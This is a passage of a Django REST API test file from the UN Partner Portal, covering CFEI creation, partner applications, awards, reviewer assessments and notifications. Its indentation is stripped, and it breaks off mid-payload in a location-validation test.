# -*- coding: utf-8 -*-
# Source: unicef/un-partner-portal, backend/unpp_api/apps/project/tests/test_views.py (Apache-2.0)
from __future__ import unicode_literals
import os
import random
from datetime import date, timedelta
import mock
from dateutil.relativedelta import relativedelta
from django.core.management import call_command
from django.test import override_settings
from django.urls import reverse
from django.conf import settings
from django.core import mail
from rest_framework import status
from account.models import User
from agency.agencies import UNICEF, WFP
from agency.models import Agency
from agency.roles import VALID_FOCAL_POINT_ROLE_NAMES, AgencyRole
from common.headers import CustomHeader
from notification.consts import NotificationType, NOTIFICATION_DATA
from partner.roles import PartnerRole
from partner.serializers import PartnerShortSerializer
from project.models import Assessment, Application, EOI, Pin
from partner.models import Partner
from common.tests.base import BaseAPITestCase
from common.factories import (
OpenEOIFactory,
AgencyMemberFactory,
PartnerSimpleFactory,
PartnerMemberFactory,
AgencyOfficeFactory,
AgencyFactory,
PartnerVerificationFactory,
UserFactory,
PartnerFactory,
get_new_common_file,
DirectEOIFactory, FinalizedEOIFactory)
from common.models import Specialization, CommonFile
from common.consts import (
SELECTION_CRITERIA_CHOICES,
JUSTIFICATION_FOR_DIRECT_SELECTION,
APPLICATION_STATUSES,
COMPLETED_REASON,
CFEI_TYPES,
CFEI_STATUSES,
EXTENDED_APPLICATION_STATUSES,
)
from project.views import PinProjectAPIView
from project.serializers import ConvertUnsolicitedSerializer
filename = os.path.join(settings.PROJECT_ROOT, 'apps', 'common', 'tests', 'test.doc')
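# Pinning EOIs that do not exist must be rejected with a validation error.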
class TestPinUnpinWrongEOIAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_PARTNER
def test_pin_unpin_project_wrong_eois(self):
url = reverse('projects:pins')
response = self.client.patch(url, data={"eoi_ids": [1, 2, 3], "pin": True})
self.assertResponseStatusIs(response, status_code=status.HTTP_400_BAD_REQUEST)
self.assertEquals(response.data['non_field_errors'], PinProjectAPIView.ERROR_MSG_WRONG_EOI_PKS)
self.assertEquals(Pin.objects.count(), 0)
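# Pin, list and unpin published EOIs as a partner user; invalid parameters are rejected.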
class TestPinUnpinEOIAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_PARTNER
quantity = 2
url = reverse('projects:pins')
def setUp(self):
super(TestPinUnpinEOIAPITestCase, self).setUp()
AgencyOfficeFactory.create_batch(self.quantity)
AgencyMemberFactory.create_batch(self.quantity)
OpenEOIFactory.create_batch(self.quantity, is_published=True)
def test_pin_unpin_project_wrong_params(self):
eoi_ids = EOI.objects.all().values_list('id', flat=True)
response = self.client.patch(self.url, data={"eoi_ids": eoi_ids, "pin": None})
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEquals(response.data['non_field_errors'], PinProjectAPIView.ERROR_MSG_WRONG_PARAMS)
self.assertEquals(Pin.objects.count(), 0)
def test_pin_unpin_project(self):
# add pins
eoi_ids = EOI.objects.all().values_list('id', flat=True)
response = self.client.patch(self.url, data={"eoi_ids": eoi_ids, "pin": True})
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
self.assertEquals(Pin.objects.count(), self.quantity)
self.assertEquals(response.data["eoi_ids"], list(eoi_ids))
# read pins
response = self.client.get(self.url)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['count'], self.quantity)
# delete pins
response = self.client.patch(self.url, data={"eoi_ids": eoi_ids, "pin": False})
self.assertResponseStatusIs(response, status_code=status.HTTP_204_NO_CONTENT)
self.assertEquals(Pin.objects.count(), 0)
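# Listing open CFEIs and the create/patch lifecycle: weighting validation, partner invitations,
# date and focal-point edits, location and specialization updates, and completion.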
class TestOpenProjectsAPITestCase(BaseAPITestCase):
quantity = 2
url = reverse('projects:open')
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
def setUp(self):
super(TestOpenProjectsAPITestCase, self).setUp()
AgencyOfficeFactory.create_batch(self.quantity)
AgencyMemberFactory.create_batch(self.quantity)
PartnerMemberFactory.create_batch(self.quantity)
OpenEOIFactory.create_batch(self.quantity, agency=self.user.agency)
def test_open_project(self):
# read open projects
response = self.client.get(self.url)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['count'], self.quantity)
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_create_patch_project(self):
ao = self.user.agency_members.first().office
payload = {
'title': "EOI title",
'agency': ao.agency.id,
'focal_points': [
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=ao).user.id
],
'locations': [
{
"admin_level_1": {"name": "Baghdad", "country_code": 'IQ'},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
{
"admin_level_1": {"name": "Paris", "country_code": "FR"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
],
'agency_office': ao.id,
'specializations': Specialization.objects.all().values_list('id', flat=True)[:2],
'description': 'Brief background of the project',
'other_information': 'Other information',
"clarification_request_deadline_date": date.today(),
'start_date': date.today(),
'end_date': date.today(),
'deadline_date': date.today(),
'notif_results_date': date.today(),
'has_weighting': True,
'assessments_criteria': [
{'selection_criteria': SELECTION_CRITERIA_CHOICES.sector, 'weight': 10},
{'selection_criteria': SELECTION_CRITERIA_CHOICES.local, 'weight': 40},
],
}
response = self.client.post(self.url, data=payload)
self.assertResponseStatusIs(response, status_code=status.HTTP_400_BAD_REQUEST)
self.assertEquals(
response.data['assessments_criteria'],
['The sum of all weight criteria must be equal to 100.']
)
payload['assessments_criteria'].extend([
{'selection_criteria': SELECTION_CRITERIA_CHOICES.cost, 'weight': 20},
{'selection_criteria': SELECTION_CRITERIA_CHOICES.innovative, 'weight': 30},
])
response = self.client.post(self.url, data=payload)
self.assertResponseStatusIs(response, status_code=status.HTTP_201_CREATED)
eoi = EOI.objects.order_by('id').last()
self.assertEquals(response.data['title'], payload['title'])
self.assertEquals(eoi.created_by.id, self.user.id)
self.assertEquals(response.data['id'], eoi.id)
self.assertTrue(eoi.is_weight_adjustments_ok, 'The sum of all weight criteria must be equal to 100.')
# invite partners
url = reverse('projects:eoi-detail', kwargs={"pk": eoi.id})
payload = {
"invited_partners": PartnerShortSerializer([
Partner.objects.first(), Partner.objects.last()
], many=True).data
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['id'], eoi.id)
self.assertTrue(Partner.objects.first().id in [p['id'] for p in response.data['invited_partners']])
self.assertEqual(len(response.data['invited_partners']), 2)
call_command('send_daily_notifications')
notification_emails = list(filter(
lambda msg: f'/cfei/open/{eoi.id}/overview' in msg.body,
mail.outbox
))
self.assertTrue(len(notification_emails) >= 1)
payload = {
"invited_partners": PartnerShortSerializer([Partner.objects.last()], many=True).data
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['id'], eoi.id)
self.assertTrue(Partner.objects.last().id in [p['id'] for p in response.data['invited_partners']])
self.assertEqual(len(response.data['invited_partners']), 1)
self.assertTrue(len(mail.outbox) > 0)  # mail.outbox is a shared resource and may contain other messages
mail.outbox = []
# edit EOI - dates & focal point(s)
payload = {
"start_date": date.today() - timedelta(days=10),
"end_date": date.today() + timedelta(days=20),
"deadline_date": date.today() + timedelta(days=10),
"notif_results_date": date.today() + timedelta(days=15),
"focal_points": [
AgencyMemberFactory(role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=ao).user.id,
]
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['notif_results_date'], str(date.today() + timedelta(days=15)))
# complete this CFEI
justification = "mission completed"
payload = {
"justification": justification,
"completed_reason": COMPLETED_REASON.cancelled,
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['completed_reason'], COMPLETED_REASON.cancelled)
self.assertTrue(response.data['completed_date'])
self.assertTrue(response.data['is_completed'])
self.assertEquals(response.data['justification'], justification)
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_patch_locations_for_project(self):
cfei = OpenEOIFactory(created_by=self.user)
details_url = reverse('projects:eoi-detail', kwargs={'pk': cfei.id})
details_response = self.client.get(details_url)
self.assertResponseStatusIs(details_response)
initial_locations = details_response.data['locations']
new_locations_payload = {
'locations': [
{
"admin_level_1": {"name": "Baghdad", "country_code": 'IQ'},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
{
"admin_level_1": {"name": "Paris", "country_code": "FR"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
],
}
update_response = self.client.patch(details_url, data=new_locations_payload)
self.assertResponseStatusIs(update_response)
self.assertEqual(
len(new_locations_payload['locations']),
len(update_response.data['locations'])
)
second_update_payload = {
'locations': [
{
"admin_level_1": {"name": "Poland", "country_code": 'PL'},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
] + initial_locations,
}
second_update_response = self.client.patch(details_url, data=second_update_payload)
self.assertResponseStatusIs(second_update_response)
self.assertEqual(
len(second_update_payload['locations']),
len(second_update_response.data['locations'])
)
self.assertTrue(
{l['id'] for l in initial_locations}.issubset(
{l['id'] for l in second_update_response.data['locations']}
)
)
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_patch_specializations_for_project(self):
cfei = OpenEOIFactory(created_by=self.user)
details_url = reverse('projects:eoi-detail', kwargs={'pk': cfei.id})
details_response = self.client.get(details_url)
self.assertResponseStatusIs(details_response)
for _ in range(10):
spec_count = random.randint(2, 7)
update_payload = {
'specializations': Specialization.objects.order_by('?').values_list('id', flat=True)[:spec_count],
}
update_response = self.client.patch(details_url, data=update_payload)
self.assertResponseStatusIs(update_response)
self.assertEqual(len(update_response.data['specializations']), spec_count)
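# Creating direct-selection CFEIs together with their partner applications.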
class TestDirectProjectsAPITestCase(BaseAPITestCase):
quantity = 2
url = reverse('projects:direct')
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
def setUp(self):
super(TestDirectProjectsAPITestCase, self).setUp()
PartnerSimpleFactory()
AgencyOfficeFactory.create_batch(self.quantity)
AgencyMemberFactory.create_batch(self.quantity)
OpenEOIFactory.create_batch(self.quantity)
# TODO: This test is not deterministic - randomly fails
def test_create_direct_project(self):
ao = self.user.agency_members.first().office
payload = {
'eoi': {
'title': "EOI title",
'agency': ao.agency.id,
'focal_points': [self.user.id],
'locations': [
{
"admin_level_1": {"name": "Baghdad", "country_code": 'IQ'},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
{
"admin_level_1": {"name": "Paris", "country_code": "FR"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
],
'agency_office': ao.id,
'specializations': Specialization.objects.all().values_list('id', flat=True)[:2],
'description': 'Brief background of the project',
'other_information': 'Other information',
'start_date': date.today(),
'end_date': date.today(),
'notif_results_date': date.today(),
'has_weighting': True,
},
'applications': [
{
"partner": Partner.objects.last().id,
"ds_justification_select": [
JUSTIFICATION_FOR_DIRECT_SELECTION.known,
JUSTIFICATION_FOR_DIRECT_SELECTION.local,
],
"ds_attachment": get_new_common_file().id,
"justification_reason": "To save those we love."
},
]
}
response = self.client.post(self.url, data=payload)
self.assertEqual(response.status_code, status.HTTP_201_CREATED, msg=response.data)
self.assertEquals(response.data['eoi']['title'], payload['eoi']['title'])
self.assertEquals(response.data['eoi']['created_by'], self.user.id)
self.assertEquals(response.data['eoi']['display_type'], CFEI_TYPES.direct)
self.assertEquals(response.data['eoi']['id'], EOI.objects.order_by('id').last().id)
app = Application.objects.get(pk=response.data['applications'][0]['id'])
self.assertEquals(app.submitter, self.user)
self.assertEquals(
app.ds_justification_select,
[JUSTIFICATION_FOR_DIRECT_SELECTION.known, JUSTIFICATION_FOR_DIRECT_SELECTION.local]
)
self.assertIsNotNone(response.data['applications'][-1]['ds_attachment'])
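# Partner-side application flow: apply once, reject a duplicate application, and deny agency-only endpoints.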
class TestPartnerApplicationsAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_PARTNER
def setUp(self):
super(TestPartnerApplicationsAPITestCase, self).setUp()
AgencyOfficeFactory.create_batch(self.quantity)
AgencyMemberFactory.create_batch(self.quantity)
OpenEOIFactory.create_batch(self.quantity, display_type='NoN')
PartnerSimpleFactory.create_batch(self.quantity)
@mock.patch('partner.models.Partner.profile_is_complete', lambda _: True)
def test_create(self):
self.client.set_headers({
CustomHeader.PARTNER_ID.value: self.user.partner_members.first().partner.id
})
eoi_id = EOI.objects.first().id
url = reverse('projects:partner-applications', kwargs={"pk": eoi_id})
payload = {
"cn": get_new_common_file().id,
}
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
app = Application.objects.last()
self.assertEquals(response.data['id'], app.id)
self.assertEquals(app.submitter.id, self.user.id)
common_file = CommonFile.objects.create()
common_file.file_field.save('test.csv', open(filename))
payload = {
"cn": common_file.id,
}
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEquals(response.data[0], 'You already applied for this project.')
url = reverse('projects:agency-applications', kwargs={"pk": eoi_id})
payload = {
"partner": Partner.objects.exclude(applications__eoi_id=eoi_id).order_by('?').last().id,
"ds_justification_select": [JUSTIFICATION_FOR_DIRECT_SELECTION.known],
"justification_reason": "a good reason",
}
response = self.client.post(url, data=payload)
expected_msgs = 'You do not have permission to perform this action.'
self.assertEquals(response.data['detail'], expected_msgs)
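# Agency-side creation and deletion of applications on behalf of verified partners.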
class TestAgencyApplicationsAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
def setUp(self):
super(TestAgencyApplicationsAPITestCase, self).setUp()
AgencyMemberFactory.create_batch(self.quantity)
PartnerSimpleFactory.create_batch(self.quantity)
@mock.patch('partner.models.Partner.profile_is_complete', lambda _: True)
def test_create(self):
eoi = OpenEOIFactory(display_type='NoN', agency=self.user.agency)
eoi.focal_points.add(self.user)
url = reverse('projects:agency-applications', kwargs={"pk": eoi.id})
partner = Partner.objects.last()
PartnerVerificationFactory(partner=partner)
payload = {
"partner": partner.id,
"ds_justification_select": [JUSTIFICATION_FOR_DIRECT_SELECTION.known],
"justification_reason": "a good reason",
}
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
app_id = eoi.applications.last().id
self.assertEqual(response.data['id'], app_id)
eoi.display_type = CFEI_TYPES.direct
eoi.save()
url = reverse('projects:agency-applications-delete', kwargs={"pk": app_id, "eoi_id": eoi.id})
response = self.client.delete(url)
self.assertResponseStatusIs(response, status.HTTP_204_NO_CONTENT)
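# Full application lifecycle: preselect, award, accept/decline and withdraw, with role and permission checks.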
class TestApplicationsAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
def setUp(self):
super(TestApplicationsAPITestCase, self).setUp()
AgencyOfficeFactory.create_batch(self.quantity)
AgencyMemberFactory.create_batch(self.quantity)
# make sure the creating user is not the current one
creator = UserFactory()
AgencyMemberFactory(user=creator, office=self.user.agency_members.first().office)
self.eoi = OpenEOIFactory(is_published=True, created_by=creator, agency=self.user.agency)
self.eoi.focal_points.clear()
@override_settings(EMAIL_BACKEND='django.core.mail.backends.locmem.EmailBackend')
def test_read_update_application(self):
application = self.eoi.applications.first()
PartnerMemberFactory.create_batch(5, partner=application.partner)
url = reverse('projects:application', kwargs={"pk": application.id})
response = self.client.get(url)
self.assertResponseStatusIs(response)
self.assertFalse(response.data['did_win'])
self.assertEquals(response.data['ds_justification_select'], [])
payload = {
"status": APPLICATION_STATUSES.preselected,
"ds_justification_select": [JUSTIFICATION_FOR_DIRECT_SELECTION.local],
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEquals(
response.data['non_field_errors'],
['Only Focal Point/Creator is allowed to pre-select/reject an application.']
)
self.client.logout()
creator = application.eoi.created_by
self.client.force_login(creator)
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_403_FORBIDDEN)
creator.agency_members.update(role=AgencyRole.EDITOR_ADVANCED.name)
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_200_OK)
self.assertEquals(response.data['status'], APPLICATION_STATUSES.preselected)
self.assertEquals(response.data['ds_justification_select'], [JUSTIFICATION_FOR_DIRECT_SELECTION.local])
payload = {
"did_win": True,
"status": APPLICATION_STATUSES.preselected,
"justification_reason": "good reason",
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertIn('review_summary_comment', response.data)
application.eoi.review_summary_comment = 'Test comment'
application.eoi.save()
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEquals(
response.data['non_field_errors'],
['You cannot award an application if the profile has not been verified yet.']
)
PartnerVerificationFactory(partner=application.partner, submitter=application.eoi.created_by)
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertIn('application_status', response.data)
self.assertTrue(response.data['did_win'])
self.assertEquals(response.data['status'], APPLICATION_STATUSES.preselected)
call_command('send_daily_notifications')
self.assertTrue(len(mail.outbox) > 0)
mail.outbox = []
partner_user = UserFactory()
PartnerMemberFactory(user=partner_user, partner=application.partner, role=PartnerRole.ADMIN.name)
self.client.force_login(partner_user)
# accept offer
payload = {
"did_accept": True,
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertTrue(response.data['did_accept'])
self.assertEquals(response.data['decision_date'], str(date.today()))
self.client.force_login(application.eoi.created_by)
awarded_partners_response = self.client.get(
reverse('projects:applications-awarded-partners', kwargs={"eoi_id": application.id})
)
self.assertEqual(
awarded_partners_response.status_code, status.HTTP_200_OK, msg=awarded_partners_response.content
)
if awarded_partners_response.data:
self.assertEqual(awarded_partners_response.data[0]['partner_decision_date'], str(date.today()))
self.assertEqual(awarded_partners_response.data[0]['partner_notified'].date(), date.today())
self.client.force_login(partner_user)
payload = {
"did_accept": False,
"did_decline": True,
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertFalse(response.data['did_accept'])
self.assertTrue(response.data['did_decline'])
self.client.force_login(application.eoi.created_by)
reason = "They are better then You."
payload = {
"did_withdraw": True,
"withdraw_reason": reason,
"status": APPLICATION_STATUSES.rejected,
}
response = self.client.patch(url, data=payload)
self.assertTrue(status.is_client_error(response.status_code))
self.assertEquals(
response.data["non_field_errors"], ["Since assessment has begun, application can't be rejected."]
)
application.assessments.all().delete()
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertTrue(response.data['did_win'])
self.assertTrue(response.data['did_withdraw'])
self.assertEquals(response.data["withdraw_reason"], reason)
class TestReviewerAssessmentsAPIView(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
initial_factories = [
PartnerSimpleFactory,
PartnerMemberFactory,
AgencyFactory,
AgencyOfficeFactory,
AgencyMemberFactory,
OpenEOIFactory,
]
def test_add_review(self):
app = Application.objects.first()
app.status = APPLICATION_STATUSES.preselected
app.save()
url = reverse(
'projects:reviewer-assessments',
kwargs={
"application_id": app.id,
"reviewer_id": self.user.id,
}
)
note = 'I like this application, has strong sides...'
payload = {
'scores': [
{'selection_criteria': SELECTION_CRITERIA_CHOICES.sector, 'score': 50},
{'selection_criteria': SELECTION_CRITERIA_CHOICES.local, 'score': 75},
{'selection_criteria': SELECTION_CRITERIA_CHOICES.cost, 'score': 60},
{'selection_criteria': SELECTION_CRITERIA_CHOICES.innovative, 'score': 90},
],
'note': note,
}
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_403_FORBIDDEN)
# add the logged-in agency member to the EOI/application reviewers
app.eoi.reviewers.add(self.user)
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.data['non_field_errors'],
['Assessment allowed once deadline is passed.']
)
app.eoi.deadline_date = date.today() - timedelta(days=1)
app.eoi.is_published = True
app.eoi.save()
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.data['non_field_errors'], ["You can score only selection criteria defined in CFEI."]
)
scores = []
for criterion in app.eoi.assessments_criteria:
scores.append({
'selection_criteria': criterion.get('selection_criteria'), 'score': 100
})
payload['scores'] = scores
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
self.assertEquals(
response.data['non_field_errors'],
["The maximum score is equal to the value entered for the weight."]
)
scores = []
for criterion in app.eoi.assessments_criteria:
scores.append({
'selection_criteria': criterion.get('selection_criteria'), 'score': criterion.get('weight') - 1
})
payload['scores'] = scores
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status_code=status.HTTP_201_CREATED)
self.assertEquals(response.data['date_reviewed'], str(date.today()))
self.assertEquals(len(response.data['scores']), len(payload['scores']))
assessment_id = Assessment.objects.last().id
self.assertEquals(response.data['id'], assessment_id)
url = reverse(
'projects:reviewer-assessments',
kwargs={
"application_id": Application.objects.first().id,
"reviewer_id": self.user.id,
}
)
payload = {
'note': 'patch note test',
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['note'], payload['note'])
self.assertEquals(response.data['id'], assessment_id)
self.assertEquals(Assessment.objects.last().note, payload['note'])
scores = []
for criterion in app.eoi.assessments_criteria:
scores.append({
'selection_criteria': criterion.get('selection_criteria'), 'score': criterion.get('weight') - 3
})
payload = {
'scores': scores,
'note': note,
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_200_OK)
self.assertEquals(response.data['note'], payload['note'])
self.assertEquals(response.data['scores'], payload['scores'])
complete_assessments_url = reverse('projects:eoi-reviewers-complete-assessments', kwargs={"eoi_id": app.eoi.id})
complete_response = self.client.post(complete_assessments_url)
self.assertResponseStatusIs(complete_response)
self.assertTrue(len(complete_response.data) > 0)
self.assertTrue(all([a['completed'] for a in complete_response.data]))
url = reverse(
'projects:reviewer-assessments',
kwargs={
"application_id": Application.objects.first().id,
"reviewer_id": self.user.id,
}
)
payload = {
'note': 'patch note test',
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_400_BAD_REQUEST)
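# Partner creates an unsolicited concept note; an agency user then converts it to a direct selection.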
class TestCreateUnsolicitedProjectAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_PARTNER
partner_role = PartnerRole.ADMIN
def test_create_convert(self):
url = reverse('projects:applications-unsolicited')
filename = os.path.join(settings.PROJECT_ROOT, 'apps', 'common', 'tests', 'test.doc')
cfile = CommonFile.objects.create()
cfile.file_field.save('test.csv', open(filename))
payload = {
"locations": [
{
"admin_level_1": {"country_code": 'IQ', "name": "Baghdad"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
{
"admin_level_1": {"country_code": "FR", "name": "Paris"},
"lat": random.randint(-90, 90),
"lon": random.randint(-180, 180),
},
],
"title": "Unsolicited Project",
"agency": Agency.objects.first().id,
"specializations": Specialization.objects.all()[:3].values_list("id", flat=True),
"cn": cfile.id,
}
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
app = Application.objects.last()
self.assertEquals(response.data['id'], str(app.id))
self.assertEquals(app.cn.id, cfile.id)
self.assertEquals(app.proposal_of_eoi_details['title'], payload['title'])
for idx, item in enumerate(app.proposal_of_eoi_details['specializations']):
self.assertEquals(
str(app.proposal_of_eoi_details['specializations'][idx]),
str(payload['specializations'][idx])
)
self.client.logout()
# create agency members to serve as focal points, plus an agency member to perform the conversion
AgencyMemberFactory()
self.user = User.objects.filter(agency_members__isnull=False).first()
self.client.force_login(self.user)
self.user_type = BaseAPITestCase.USER_AGENCY
self.set_current_user_role(AgencyRole.EDITOR_ADVANCED.name)
self.client.set_headers({
CustomHeader.AGENCY_OFFICE_ID.value: self.user.agency_members.first().office_id
})
url = reverse('projects:convert-unsolicited', kwargs={'pk': response.data['id']})
start_date = date.today()
end_date = date.today() + timedelta(days=30)
office = AgencyOfficeFactory(agency=app.agency)
focal_points = [
am.user.id for am in AgencyMemberFactory.create_batch(
3, role=list(VALID_FOCAL_POINT_ROLE_NAMES)[0], office=office
)
]
payload = {
'ds_justification_select': [JUSTIFICATION_FOR_DIRECT_SELECTION.other],
'justification': 'Explain justification for creating direct selection',
'focal_points': focal_points,
'description': 'Provide brief background of the project',
'other_information': '',
'start_date': str(start_date),
'end_date': str(end_date),
}
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
eoi = EOI.objects.last()
self.assertEquals(EOI.objects.count(), 1)
self.assertEquals(eoi.other_information, payload['other_information'])
self.assertEquals(eoi.description, payload['description'])
self.assertEquals(eoi.start_date, start_date)
self.assertEquals(eoi.end_date, end_date)
self.assertEquals(eoi.display_type, CFEI_TYPES.direct)
self.assertEquals(eoi.status, CFEI_STATUSES.open)
self.assertEquals(eoi.focal_points.all().count(), len(focal_points))
self.assertEquals(eoi.created_by, self.user)
self.assertEquals(Application.objects.count(), 2)
# try to convert again
response = self.client.post(url, data=payload)
self.assertResponseStatusIs(response, status_code=status.HTTP_400_BAD_REQUEST)
self.assertEquals(response.data['non_field_errors'], [ConvertUnsolicitedSerializer.RESTRICTION_MSG])
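# Patching the review summary comment and attachment on a CFEI.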
class TestReviewSummaryAPIViewAPITestCase(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
def test_add_review(self):
url = reverse('common:file')
filename = os.path.join(settings.PROJECT_ROOT, 'apps', 'common', 'tests', 'test.doc')
with open(filename) as doc:
payload = {
"file_field": doc
}
response = self.client.post(url, data=payload, format='multipart')
self.assertResponseStatusIs(response, status.HTTP_201_CREATED)
self.assertIsNotNone(response.data['id'])
file_id = response.data['id']
PartnerMemberFactory()  # OpenEOIFactory creates applications, which require an existing partner member
eoi = OpenEOIFactory(created_by=self.user)
url = reverse('projects:review-summary', kwargs={"pk": eoi.id})
payload = {
'review_summary_comment': "comment",
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response, status.HTTP_200_OK)
self.assertEquals(response.data['review_summary_comment'], payload['review_summary_comment'])
payload = {
'review_summary_comment': "comment2",
'review_summary_attachment': None
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(
response.data['review_summary_comment'], payload['review_summary_comment']
)
payload = {
'review_summary_comment': "comment3",
'review_summary_attachment': file_id
}
response = self.client.patch(url, data=payload)
self.assertResponseStatusIs(response)
self.assertEquals(response.data['review_summary_comment'], payload['review_summary_comment'])
self.assertTrue(
response.data['review_summary_attachment'].find(CommonFile.objects.get(pk=file_id).file_field.url) > 0
)
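# GET and PATCH on the EOI detail endpoint must serialize the same set of fields.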
class TestInvitedPartnersListAPIView(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
def test_serializes_same_fields_on_get_and_patch(self):
eoi = OpenEOIFactory(created_by=self.user)
url = reverse('projects:eoi-detail', kwargs={"pk": eoi.id})
read_response = self.client.get(url)
self.assertResponseStatusIs(read_response)
update_response = self.client.patch(url, {
'title': 'Another title'
})
self.assertResponseStatusIs(update_response)
self.assertEqual(set(read_response.data.keys()), set(update_response.data.keys()))
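# Notifying a reviewer about pending assessments; repeated notifications are throttled
# (a second POST returns 200, and a mocked clock 25 hours later allows a new 201).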
class TestEOIReviewersAssessmentsNotifyAPIView(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
quantity = 1
def setUp(self):
super(TestEOIReviewersAssessmentsNotifyAPIView, self).setUp()
PartnerSimpleFactory()
AgencyOfficeFactory.create_batch(self.quantity)
AgencyMemberFactory.create_batch(self.quantity)
OpenEOIFactory.create_batch(self.quantity)
def test_send_notification(self):
eoi = EOI.objects.first()
eoi.reviewers.add(self.user)
url = reverse('projects:eoi-reviewers-assessments-notify', kwargs={
"eoi_id": eoi.id, "reviewer_id": self.user.id
})
create_notification_response = self.client.post(url)
self.assertEqual(
create_notification_response.status_code, status.HTTP_201_CREATED,
msg=create_notification_response.content
)
notifications_response = self.client.get('/api/notifications/')
self.assertEqual(notifications_response.status_code, status.HTTP_200_OK)
self.assertEqual(notifications_response.data['count'], 1)
self.assertEqual(
notifications_response.data['results'][0]['notification']['source'], NotificationType.CFEI_REVIEW_REQUIRED
)
create_notification_response = self.client.post(url)
self.assertEqual(create_notification_response.status_code, status.HTTP_200_OK)
self.assertIn('success', create_notification_response.json())
with mock.patch('notification.helpers.timezone.now') as mock_now:
mock_now.return_value = eoi.created + relativedelta(hours=25)
create_notification_response = self.client.post(url)
self.assertEqual(create_notification_response.status_code, status.HTTP_201_CREATED)
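# Location payload validation on CFEI creation: name/lat/lon requirements vary by country.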
class TestLocationRequiredOnCFEICreate(BaseAPITestCase):
user_type = BaseAPITestCase.USER_AGENCY
agency_role = AgencyRole.EDITOR_ADVANCED
def setUp(self):
super(TestLocationRequiredOnCFEICreate, self).setUp()
office = self.user.agency_members.first().office
self.base_payload = {
"specializations": [
24
],
"assessments_criteria": [
{
"selection_criteria": "LEP",
"description": "asdasdasdasd"
}
],
"title": "asdasdasd",
"focal_points": [
self.user.id
],
"description": "asdasdas",
"goal": "asdasdsa",
"clarification_request_deadline_date": date.today(),
"deadline_date": date.today() + relativedelta(days=1),
"notif_results_date": date.today() + relativedelta(days=2),
"start_date": date.today() + relativedelta(days=10),
"end_date": date.today() + relativedelta(days=20),
"has_weighting": False,
"locations": [
{
"admin_level_1": {
"country_code": "CV"
